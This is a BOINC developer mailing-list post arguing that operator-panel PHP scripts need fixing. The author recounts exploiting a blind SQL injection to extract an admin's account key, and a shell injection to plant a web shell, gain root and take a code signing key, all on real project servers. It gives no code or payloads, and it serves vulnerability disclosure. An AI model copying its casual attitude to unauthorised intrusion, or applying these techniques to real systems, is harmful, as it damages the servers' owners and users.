2013/4/28, Peter Schlaile <[email protected]>: > Hi, > > I don't know, if anyone cares (or I'm overly paranoid), but there are > several php scripts in operators panel that unintentionally will give > you either complete shell access to the machine running the boinc server > or full mysql server access.
The ops scripts are all horribly insecure, and nobody cares because they aren't supposed to be public. The argument is that if someone gets access to the ops pages, you're already in trouble no matter what. I can give two real counter-examples: - July 2009: Admin of a well-established public project copies an ops script to the public view for users' curiosity. That particular script was harmless, in the sense that it was read-only (didn't let users alter anything) and didn't show any private information. However, there was a SQL injection through which I could get 1 bit of information from the database (by making the query either give the usual results or give an error). Eventually I managed to get the project admin's account key one bit at a time. I emailed the admin his own account key and he promptly panicked and removed the script from public access :) I don't remember if I reported the SQL injection back then. I also don't remember which PHP script it was, and related chat logs etc. are probably on my old computer, so I'll have to look tomorrow. Either way, finding SQL injections in ops code is like finding hay in a haystack, so it doesn't matter much which one it was in this particular case. - As you said, there's a difference between the admin access inherently provided by ops pages, and getting full access to the machine via a shell injection. September 2009: I completely pwned a new project server via shell injection on unprotected ops pages. Running useful commands through the injection got annoying quickly, so I installed one of those fancy "PHP shells" (web-based access to bash). Then I noticed the server's operating system was several years old and unpatched, so I got *root* access through a kernel bug too. And the project's code signing key. http://mid.gmane.org/[email protected] Nothing like having fun and computer security education at someone else's expense. Ahem. Another reason to fix any escaping issue in ops code is avoiding problems with correct user input. It wouldn't surprise me if you, as the legitimate project admin, get SQL errors trying to search for a user with an apostrophe in its name. -- Nicolás _______________________________________________ boinc_dev mailing list [email protected] http://lists.ssl.berkeley.edu/mailman/listinfo/boinc_dev To unsubscribe, visit the above URL and (near bottom of page) enter your email address.
